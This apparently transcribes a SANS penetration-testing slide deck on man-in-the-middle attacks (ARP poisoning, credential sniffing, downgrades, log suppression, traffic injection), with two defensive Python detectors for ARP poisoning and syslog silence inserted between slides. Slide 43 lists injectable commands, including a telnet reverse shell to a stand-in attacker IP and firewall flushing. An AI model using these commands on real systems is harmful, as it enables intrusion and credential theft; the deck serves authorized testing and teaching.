All your layer are belong to us

This presentation discusses various uses of man-in-the-middle attacks for penetration testers.

  1. SANS Institute: “Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen”. Layered Security. Bryce Galbraith, Owner. CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA. ©2009 SANS & Bryce Galbraith
  2. SANS Biography
     • Bryce Galbraith, Lead Consultant, Layered Security. Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 companies as well as being a senior member of Foundstone's world-renowned attack and penetration team. Bryce also served as senior instructor and co-author of Foundstone's "Ultimate Hacking: Hands-On" series. He has taught the art of ethical hacking and countermeasures to thousands of IT professionals from a who's who of top companies, financial institutions, and government agencies around the globe. Bryce currently teaches Security 504: Hacker Techniques, Exploits and Incident Handling; Security 560: Network Penetration Testing and Ethical Hacking; Security 517: Cutting-Edge Hacking Techniques; Security 550: Advanced Information Recon; Security 401: SANS Security Essentials Bootcamp Style; and Security 561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells for the SANS Institute. Bryce is an active member of several security-related professional organizations, he speaks at a variety of conferences, and he holds a number of certifications: CISSP, GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently the lead consultant and co-founder of Layered Security.
  3. Coming Up!
     • Overview
     • Token Warnings
     • The Toolz
     • ARP-Poisoning Primer
     • The Attacks
     • The Future?
     • Q&A
  4. Overview
     • What do you do when traditional attack vectors fail?
       – Remote exploits, password guessing, web app attacks, etc.
       – Social engineering? Physical attacks?
       – They rarely fail, but if they do…
     • What’s left, the report?
  5. Overview
     • There are other options: MitM!
     • MitM attacks open up systems that might otherwise be impregnable.
       – No weak passwords, no public exploits, ACLs, even strong authentication. Inconceivable, right!? Not exactly…
     • Besides, MitMs are cooler than guessing passwords or pwning weak systems ;)
  6. Overview
     • We’re going to discuss several strategic uses of MitM…
     • And the toolz you will need to perform them effectively.
     • We don’t have time to get into the weeds, so I’m going to focus on the scenarios and the toolz…
  7. Token Warning
     • Always, always, always secure written permission prior to performing ANY testing.
     • Especially the things I’m about to show you.
     • Client-side attack focus: touchy!
  8. Token Warning
     • Additional considerations
     • MitM attacks are particularly dangerous on production networks.
     • They can seriously break things!
     • The toolz have gotten much better, but they are not foolproof.
     • Always…
  9. Token Warning
     • RTFM (Read the Fine Manual ;)
       – Because, “There is no patch for stupidity.”
     • Turn off your personal firewall.
     • Practice, practice, practice!
     • Think before you act.
     • Did I mention permission?
  10. Toolz
     • Ok, so as with most of what we do, we are going to need some toolz.
     • Practice with these toolz in a lab environment until you are familiar with how they work AND how they fail to work ;)
  11. Toolz
     • dsniff
     • An oldie but a goodie
     • Mostly mentioned here to give credit where credit is due. Nice!
     • Can still be useful…
  12. Toolz
     • dsniff
       – Passive: dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy
       – MitM: arpspoof, macof, dnsspoof, sshmitm and webmitm
  13. Toolz
     • ettercap
     • Powerful MitM framework
     • Many, many features.
     • Extensible with plug-ins and ettercap “filters”: stay tuned!
     • Current development work??
  14. Toolz
     • Paros Proxy
     • Burp Suite
     • Web application proxies with many desirable features for manipulating web traffic. Hmm…
  15. Toolz
     • IRS & Sterm
     • A powerful duo for exploiting IP-based trust and gaining access to systems with ACLs specifically designed to keep you out!
       – Can spoof telnet sessions on a switch
  16. Toolz
     • Cain & Abel
     • Deceptively easy, oh so powerful!
     • Too many features to list.
     • Stay tuned…
  17. Toolz
     • Wireshark
     • Good for analysis of traffic and protocols in use on the network to find opportunities for exploitation.
     • A must-have general purpose tool.
  18. Toolz
     • Metasploit
     • Not a MitM tool per se, but very helpful in this whole process.
     • Some of the latest features in particular.
     • MitM Framework modules, anyone?
  19. Toolz
     • KARMA
     • Great for assisting you in attacking wireless clients.
     • Features are included in Metasploit as of v3.2.
  20. Toolz
     • Rainbow Tables: Google will guide you…
     • Can be used to crack strong passwords once gathered via MitM.
       – (e.g. a 14-character random password in LanMan form)
  21. Toolz
     • iptables & squid proxy
     • Your favorite scripting language(s)
     • Out-of-the-box thinking, a.k.a. a devious mind ;)
       – “How can I monkey with this traffic to get what I’m after?”
  22. Toolz
     • tcpreplay
     • nemesis
     • scapy
     • sslstrip
  23. Toolz
     • Hamster & Ferret
     • The Middler
     • ISR-evilgrade (particularly nasty)
     • Browser Exploitation Framework (BeEF)
     • Many others…
       – “Top 100 Network Security Tools”
  24. Toolz
     • Last but not least,
     • If you’re going to be doing these attacks over wireless networks
     • You may need one of these…
       – They combat mind-control
       – And protect your brain from RF ;)
  25. Hey man… (image slide)
  26. ARP-Poisoning Primer
     • Before we get rolling I need to make sure everyone has at least a basic understanding of ARP-poisoning and how it can put us in the middle of the action.
     • An enabler for numerous attacks.
     • We have limited time so…
  27. ARP-Poisoning Primer
     • On an Ethernet subnet hosts need to know the MAC address(es) of the host(s) they are trying to send Ethernet frames to.
     • Enter ARP (Address Resolution Protocol)
       – ARP resolves IPs to MAC addresses
  28. ARP-Poisoning Primer
     • ARP Requests go out to the broadcast addr FF:FF:FF:FF:FF:FF
       – Which host has IP w.x.y.z bound to your network adapter?
     • All hosts receive this broadcast
       – Even on a switch
  29. ARP-Poisoning Primer
     • Only the host with the requested IP bound to its adapter responds with an ARP Reply
       – I have w.x.y.z bound and my MAC address is xx:xx:xx:xx:xx:xx
     • Only the requester sees the reply
  30. ARP-Poisoning Primer
     • Once the MAC is learned a very important thing happens.
     • It is cached, for a while…
       – Seconds, minutes, hours, depending
     • Enter ARP Cache Poisoning
     • What if WE can influence this cached ARP entry?
  31. ARP-Poisoning Primer
     • By sending an unrequested ARP Reply (a.k.a. Gratuitous ARP Reply) to a host we can poison their ARP Cache with any MAC we choose.
     • Sweet!
     • Let’s poison them with our MAC?
  32. ARP-Poisoning Primer
     • If we tell both of them that we’re the other one, turn on a little IP forwarding and… boom! We’re in the middle!
     • Now we’re talking…
     • Not just a local LAN attack either
       – Poison the gateway as well
  33. ARP-Poisoning Primer
     • This attack puts us in a position to potentially influence EVERYthing that happens at Layers 2-7.
     • If it’s wireless, maybe Layer 1 even
     • What happens at Layers 2-7??
       – What doesn’t happen is a shorter list!
     • It’s game on!
  34. ARP-Poisoning Primer
     • These attacks can even influence layers 8 and 9, “Politics & Funding”
       – The most impregnable layers of all!
     • Demonstrations of these techniques have freed up serious funding and/or caused sweeping policy changes…
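The primer above describes exactly the traces a poisoning leaves on the wire: ARP replies that nobody requested, an IP whose cached MAC binding suddenly changes, and (when both sides are told "I am the other one") a single MAC that ends up answering for the gateway and for a host at the same time. The following Python monitor is an added example, not part of the original deck and not code from any of the tools it names; it shows how a defender watching a span port or a passive capture can flag all three signals from a sequence of ARP packets. The packet trace, the gateway address 10.0.0.1 and the MAC addresses are constructed, and the two-second request-matching window is an assumed tuning value.

```python
"""ARP cache poisoning detector (added example; constructed sample trace).

Learns IP->MAC bindings from ARP replies and raises an alert for the three
signals a poisoning attempt leaves behind: a reply that answers no recent
request, a binding that changes to a different MAC, and one MAC that ends up
answering for the gateway and another host at the same time.
"""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

ARP_REQUEST = 1
ARP_REPLY = 2


@dataclass(frozen=True)
class ArpPacket:
    ts: float          # capture time in seconds
    op: int            # ARP_REQUEST or ARP_REPLY
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


@dataclass(frozen=True)
class Alert:
    kind: str
    detail: str


class ArpMonitor:
    def __init__(self, gateway_ip: str, request_window: float = 2.0):
        self.gateway_ip = gateway_ip
        self.request_window = request_window            # assumed tuning value
        self.ip_to_mac: Dict[str, str] = {}
        # (requester_ip, asked_ip) -> time of the most recent request
        self.pending: Dict[Tuple[str, str], float] = {}
        self.reported: Set[Tuple[str, Tuple[str, ...]]] = set()
        self.alerts: List[Alert] = []

    def observe(self, p: ArpPacket) -> None:
        if p.op == ARP_REQUEST:
            # remember who asked for which address so replies can be matched
            self.pending[(p.sender_ip, p.target_ip)] = p.ts
            return
        if p.op != ARP_REPLY:
            return
        # A reply is solicited when its target recently asked for its sender IP.
        asked_at = self.pending.pop((p.target_ip, p.sender_ip), None)
        if asked_at is None or p.ts - asked_at > self.request_window:
            self.alerts.append(Alert(
                "unsolicited_reply",
                f"t={p.ts}: {p.sender_mac} tells {p.target_ip} it owns "
                f"{p.sender_ip} with no recent request"))
        self._learn(p.sender_ip, p.sender_mac)

    def _learn(self, ip: str, mac: str) -> None:
        prev = self.ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            self.alerts.append(Alert("binding_changed", f"{ip}: {prev} -> {mac}"))
        self.ip_to_mac[ip] = mac
        # One MAC answering for the gateway *and* another host is the
        # two-sided poisoning signature; report each distinct set once.
        owners = tuple(sorted(i for i, m in self.ip_to_mac.items() if m == mac))
        if (self.gateway_ip in owners and len(owners) > 1
                and (mac, owners) not in self.reported):
            self.reported.add((mac, owners))
            self.alerts.append(Alert(
                "gateway_mac_shared", f"{mac} now answers for {', '.join(owners)}"))


GATEWAY = "10.0.0.1"                 # constructed
UNKNOWN = "00:00:00:00:00:00"        # target MAC of a request is not yet known

# Constructed trace: two legitimate exchanges, then unsolicited replies from a
# third MAC telling the gateway and the host that it is the other one.
CONSTRUCTED_TRACE = [
    ArpPacket(0.00, ARP_REQUEST, "02:00:00:00:00:10", "10.0.0.10", UNKNOWN, GATEWAY),
    ArpPacket(0.01, ARP_REPLY,   "02:00:00:00:00:01", GATEWAY, "02:00:00:00:00:10", "10.0.0.10"),
    ArpPacket(1.00, ARP_REQUEST, "02:00:00:00:00:01", GATEWAY, UNKNOWN, "10.0.0.10"),
    ArpPacket(1.01, ARP_REPLY,   "02:00:00:00:00:10", "10.0.0.10", "02:00:00:00:00:01", GATEWAY),
    ArpPacket(30.0, ARP_REPLY,   "02:00:00:00:00:66", GATEWAY, "02:00:00:00:00:10", "10.0.0.10"),
    ArpPacket(30.1, ARP_REPLY,   "02:00:00:00:00:66", "10.0.0.10", "02:00:00:00:00:01", GATEWAY),
]


def run_monitor(trace=CONSTRUCTED_TRACE, gateway_ip=GATEWAY) -> List[Alert]:
    mon = ArpMonitor(gateway_ip)
    for p in trace:
        mon.observe(p)
    return mon.alerts


def summarize(alerts: List[Alert]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a.kind] = counts.get(a.kind, 0) + 1
    return counts


if __name__ == "__main__":
    for a in run_monitor():
        print(f"[{a.kind}] {a.detail}")
```

On the constructed trace the two legitimate exchanges produce nothing, and the two unsolicited replies produce five alerts: two unsolicited replies, two binding changes, and one gateway-sharing alert once the third MAC holds both 10.0.0.1 and 10.0.0.10. A real deployment needs an allowlist for hosts that legitimately answer for several addresses (routers with virtual IPs, HA pairs), which is the main source of false positives for the third check.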
  35. The Attacks
     • Now for the fun stuff!
     • I will lay out several scenarios where using MitM can be of particular use.
     • Let’s see how to crack the tough nuts!
     • Not theoretical! These work today…
  36. The Attacks
     • Credential Sniffing
       – A mainstay of MitM attacks!
       – I would be remiss if I didn’t mention it. Oh so helpful!
       – MitM makes it possible on switches.
       – Cain, dsniff and ettercap excel at this.
  37. The Attacks
     • Credential Sniffing
       – Web proxy logins over HTTP
         • Using Windows Domain credentials. Doh!
         • I have seen this at numerous clients.
       – VoIP sniffing
         • Nothing quite like it really.
       – And of course the old favorites…
  38. “Can you hear me now?” (image slide)
  39. The Attacks
     • So sniffing is awesome
     • It can make all the difference in an assessment,
     • But there are more interesting things that can be done, so let’s move on…
  40. The Attacks
     • Command Injection
       – Being able to inject arbitrary commands into an existing, authorized connection can be immensely helpful.
       – Great way to bypass strong authentication systems (e.g. one-time passwords, smart cards, DNA?, etc.)
  41. The Attacks
     • Command Injection
       – People rely too heavily on authentication and ignore the transport mechanism.
         • e.g. One-time password system over Telnet/HTTP
       – Btw, how are tokens synchronized?
       – Where is this data stored?
  42. (image slide)
  43. The Attacks
     • Command Injection
       – Sample attacks for *nix targets
         • xterm -display [hackerIP]:0.0 &
         • iptables -F
         • Reverse Telnet: telnet [hackerIP] [port] | /bin/sh | telnet [hackerIP] [port]
         • Add an account, disable logging, tftp shadow file, run virtually any command…
  44. The Attacks
     • Command Injection
       – Sample attacks for Cisco gear
         • Clear/adjust an ACL
         • TFTP the router config back to you
         • Disable/reduce logging
         • Turn on a service that may help you: SNMP, ip proxy-arp, etc.
       – You get the idea…
  45. The Attacks
     • Re-Direction
       – DNS Spoofing
         • Allows you to direct victims wherever you like
         • Their URL looks legit (e.g. …)
         • Great for:
           – Delivering client-side attacks to more savvy users
           – Social Engineering
           – Advanced phishing attacks
             » Maybe impersonate the proxy login (if it isn’t already clear-text HTTP ;)
  46. The Attacks
     • Breaking Crypto
       – Being in the middle affords great opportunities to attack crypto systems as well
         • SSHv1, RDP, PPTP
           – RDP MitM yields all keystrokes typed during the session
         • SSL (FTPS, POP3S, IMAPS, LDAPS)
         • SSL VPNs? Inconceivable! Right?
           – pwnd! Credentials and all traffic being routed.
  47-57. RDP MitM (screenshot slides)
  58. RDP MitM: No matter what your password is… .:[Th3y_w1ll-N3v3r/Gu3$$Th1$0n3]:.
  59. The Attacks
     • Breaking Crypto
       – Downgrade Attacks
         • NTLM to LM
           – Rainbow Tables: done!
           – Pass-the-Hash Toolkit
         • PPTP CHAP to PAP
         • SSHv2 to SSHv1
         • And others…
  60. The Attacks
     • Strategic DoS Attacks
       – What happens if a particular target router using AAA (e.g. RADIUS) can’t reach the server, say three times?
         • Fails to local login usually
         • Local password hash is in the config
           – Sniff: TFTP, FTP, Telnet, HTTP, SNMP, etc.
           – Hijack once to get the config, then DoS AAA access
         • Can bypass strong authentication entirely
  61. The Attacks (“These are not the logs you’re looking for…”)
     • Strategic DoS Attacks
       – How about syslog?
         • If we get in the middle of our target and the remote syslog facility…
         • We can create a warp in the space/time continuum where no log entries are stored!
         • Just from our target host! All other logging continues unaffected.
         • Once access is gained, local logs can be removed on the target as well. What hacker?
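The remote-syslog scenario above leaves a signature the log receiver itself can notice: one host that was logging steadily goes quiet while its neighbours keep reporting, and nothing arrives from it until (or unless) the interception ends. The following Python check is an added example, not from the deck; it parses RFC 3164-style syslog lines and reports every host whose silence exceeds a threshold, covering both gaps that close later in the stream and silences still open when the stream ends. The log lines and hostnames are constructed, and the 600-second threshold and the year 2009 used to complete the year-less timestamps are assumptions.

```python
"""Remote-syslog silence detector (added example; constructed sample log)."""
import re
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

# RFC 3164 style: "Mar 10 09:00:00 host program[pid]: message" (timestamp has no year)
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")

# (host, last message before the silence, first message after it; None = still silent)
Silence = Tuple[str, datetime, Optional[datetime]]


def parse_line(line: str, year: int) -> Optional[Tuple[datetime, str, str]]:
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["host"], m["msg"]


def find_silences(lines: Iterable[str], max_gap_seconds: float,
                  year: int = 2009) -> List[Silence]:
    """Report each host whose inter-message gap exceeded max_gap_seconds."""
    last_seen: Dict[str, datetime] = {}
    silences: List[Silence] = []
    newest: Optional[datetime] = None
    for line in lines:
        parsed = parse_line(line, year)
        if parsed is None:
            continue                      # not a syslog line we understand
        ts, host, _ = parsed
        prev = last_seen.get(host)
        if prev is not None and (ts - prev).total_seconds() > max_gap_seconds:
            silences.append((host, prev, ts))   # gap closed: host resumed at ts
        last_seen[host] = ts
        if newest is None or ts > newest:
            newest = ts
    # Hosts that never resumed: compare against the newest message from anyone.
    if newest is not None:
        for host, prev in sorted(last_seen.items()):
            if (newest - prev).total_seconds() > max_gap_seconds:
                silences.append((host, prev, None))
    return silences


# Constructed sample: db01 reports every five minutes throughout, web01 goes
# quiet for twenty minutes and comes back, fw01 goes quiet and never returns.
SAMPLE_LOG = """\
Mar 10 09:00:00 web01 sshd[201]: Accepted publickey for ops from 10.0.0.5 port 50122
Mar 10 09:00:00 db01 postgres[44]: checkpoint complete
Mar 10 09:00:00 fw01 kernel: link up on eth1
Mar 10 09:02:00 fw01 ntpd[12]: synchronized to 10.0.0.1
Mar 10 09:05:00 web01 cron[300]: (root) CMD (run-parts /etc/cron.hourly)
Mar 10 09:05:00 db01 postgres[44]: checkpoint complete
Mar 10 09:10:00 db01 postgres[44]: checkpoint complete
Mar 10 09:15:00 db01 postgres[44]: checkpoint complete
Mar 10 09:20:00 db01 postgres[44]: checkpoint complete
Mar 10 09:25:00 web01 cron[301]: (root) CMD (run-parts /etc/cron.hourly)
Mar 10 09:25:00 db01 postgres[44]: checkpoint complete
"""


if __name__ == "__main__":
    for host, since, until in find_silences(SAMPLE_LOG.splitlines(), 600):
        end = until.strftime("%H:%M") if until else "still silent"
        print(f"{host}: no messages after {since.strftime('%H:%M')} ({end})")
```

The threshold has to be set per host class: a host that normally logs once an hour needs a longer window than one that emits a heartbeat every minute, so in practice the baseline interval is learned per host rather than taken from one global constant. The check also says nothing about why the host went quiet; a crashed syslog daemon, a dead link and an interposed attacker all look the same here, which is why a silence alert is a prompt to verify the host out of band rather than a verdict.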
  62. The Attacks
     • So, I could go on with these types of scenarios, but I want to focus on the particularly nasty attacks that MitM enables…
  63. The Attacks
     • Arbitrary Modification/Insertion
       – It’s all about trusting trust.
       – We have to trust at some level to get any work done (or “waste” time on non-work-related activities ;)
       – What if the communications to/from the system we “trust” are influenced, real-time, by an attacker? Hmm…
  64. The Attacks
     • Arbitrary Modification/Insertion
       – The next several scenarios serve as an overview of the numerous opportunities MitM provides with common network traffic.
       – This actually affects ALL of US when we’re online as well.
       – “Turnabout is fair play”, as they say...
  65. The Attacks
     • Arbitrary Modification/Insertion
       – To get the ball rolling, here is a little scenario I cooked up to illustrate what I mean…
         • DNS spoof to my machine
         • Proxy the web traffic using Paros Proxy
         • Use a filter to find/replace HTML on the return!
       – The victim(s) see…
  66. Virtually any page element or DNS request… (image slide)
  67. The Attacks
     • Arbitrary Modification/Insertion
       – Being able to modify or insert most anything we want opens up all sorts of opportunities.
       – Even if the user gets some kind of warning, it’s a “trusted” site, right?
       – Can even bypass tools like the popular NoScript Firefox plug-in!
  68. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • Insert nefarious web content into the stream
           – JavaScript, ActiveX and other active web content…
         • Major enabler for XSS attacks
         • Steal auth/session cookies to re-use
         • IFrame attacks
         • Substitute any text, links, graphics at will
         • Replace a download link with your file ;)
  69. (image slide)
  70. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • Substitute embedded video/audio links
         • Inject code to post their creds to you first without SSL, then establish SSL and post to the real site.
           – sslstrip does this
         • Replace a hyperlink with a UNC connection to cause Windows creds to be sent to you.
  71. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • View contents of the Clipboard of the visiting browser. Thank you, Internet Explorer!
         • Pop-up windows: “Your Google Toolbar is out-of-date. Click here to…”
         • ISR-evilgrade: truly nasty
         • Web-based e-mail
           – Read/modify messages/contacts, upload/download a different attachment real-time.
  72. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • More realistic and elaborate phishing and other social engineering attacks.
           – Real site content, slightly modified on the return.
         • Intranet sites. Phishing?
         • “Test” web apps under the context of a legitimate user!? Are they hacking the site??
           – By injecting SQL commands, for instance
  73. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • VoIP call setup and teardown manipulation
           – Often clear-text HTTP-like commands
         • IM traffic: “Check out this file!”
         • Stock “Pump n’ Dump” transactions
         • Inject SQL commands between the web/app server and the database server. It’s the trusted web/app server, right?
  74. The Attacks
     • Arbitrary Modification/Insertion
       – Scenarios
         • Manipulate other protocols, custom protocols…
         • SCADA
       – The only limitation here is your imagination really…
  75. The Attacks
     • Arbitrary Modification/Insertion
       – Getting all of this set up on a local LAN is relatively straightforward.
       – Wireless is basically the same; however, it provides additional opportunities.
       – Check out this very versatile rig that I use for some wireless attacks…
  76. The Attacks
     • Portable AP w/ Internet (diagram slide; labels recovered from the slide text)
       – So many options…
       – Internet: wireless broadband (e.g. EV-DO, EDGE, 3G), built in to many laptops today
       – Internet Connection Sharing
       – D-Link DWL-G730AP USB Access Point
       – “concourse”: built-in wireless association to the AP
       – Running Cain (Windows)
       – BackTrack in a VM or on a second laptop w/ another wireless card.
  77. The Attacks
     • Uh hmm…
       – Did I mention permission??
     • So what about the future?
  78. The Future?
     • We will likely see…
       – Additional side-jacking tools
         • Myspace, Facebook, LinkedIn, web mail, etc.
       – RDP playback with full graphical display. Cain gets all the data…
       – Injection: SSL, RDP, SSHv1, SSHv2?
       – Additional downgrade attacks
       – Better VoIP replay/modification toolz
  79. The Future?
     • How about…
       – A fully extensible and modular MitM framework built into Metasploit
         • Metasploit-in-the-Middle, anyone??
         • Metasploit 3.2 is a start…
       – RFID attacks?
         • “Elvis Comes Back from the Dead to Prove RFID ePassports Lack Security”
  80. The Future? (image slide)
  81. The Future? (image slide)
  82. I told you, man… (image slide)
  83. End-user awareness? Used in a test. Users couldn’t click it fast enough… (image slide)
  84. Discretion? (image slide)
  85. The future? (image slide)
  86. SANS Institute: “Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen”. Layered Security. Bryce Galbraith, Lead Consultant & Co-Founder. CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA.